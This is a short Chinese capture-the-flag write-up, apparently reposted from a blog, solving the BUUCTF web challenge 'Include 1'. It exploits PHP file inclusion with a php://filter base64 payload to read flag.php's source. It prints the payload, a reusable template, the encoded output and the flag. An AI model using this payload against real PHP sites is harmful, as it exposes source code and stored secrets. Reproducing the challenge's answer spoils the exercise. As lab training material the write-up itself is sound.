题目简介 题目名称:[ACTF2020 新生赛]Include 1题目平台:BUUCTF题目类型:WEB考察知识点: 文件包含漏洞 解题步骤 启动并访问靶机,主页只有一个tips连接,我们访问该
启动并访问靶机,主页只有一个tips连接,我们访问该链接,发现通过file伪协议,打开了flag.PHP这个文件,说明存在文件包含漏洞。
2.既然该文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到flag,猜测flag应该是在flag.php的源代码当中
3.我们可以利用php://filter伪协议来查看flag.php的源代码,构造payload:?file=php://filter/convert.base64-encode/resource=flag.php
4.成功获取到flag.php加密后到源代码内容:PD9waHAKZWNobyaiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iowovL2ZsYWd7OTFkYTNhNjgtODM2My00ODBmLTk0NWMtZjA4NWU1MjkzMjAyfQo=
5.将其base64解密后,成功获取到flag:flag{91da3a68-8363-480f-945c-f085e5293202}
xxx.php?xxx=php://filter/convert.base64-encode/resource=xxx.php
分享网络安全学习笔记和CTF真题详解,更多内容欢迎大家关注公众号:【张甲】
来源地址:https://blog.csdn.net/weixin_38832257/article/details/126395209
--结束END--
本文标题: [ACTF2020 新生赛]Include 1【文件包含漏洞】
本文链接: https://lsjlt.com/news/414436.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0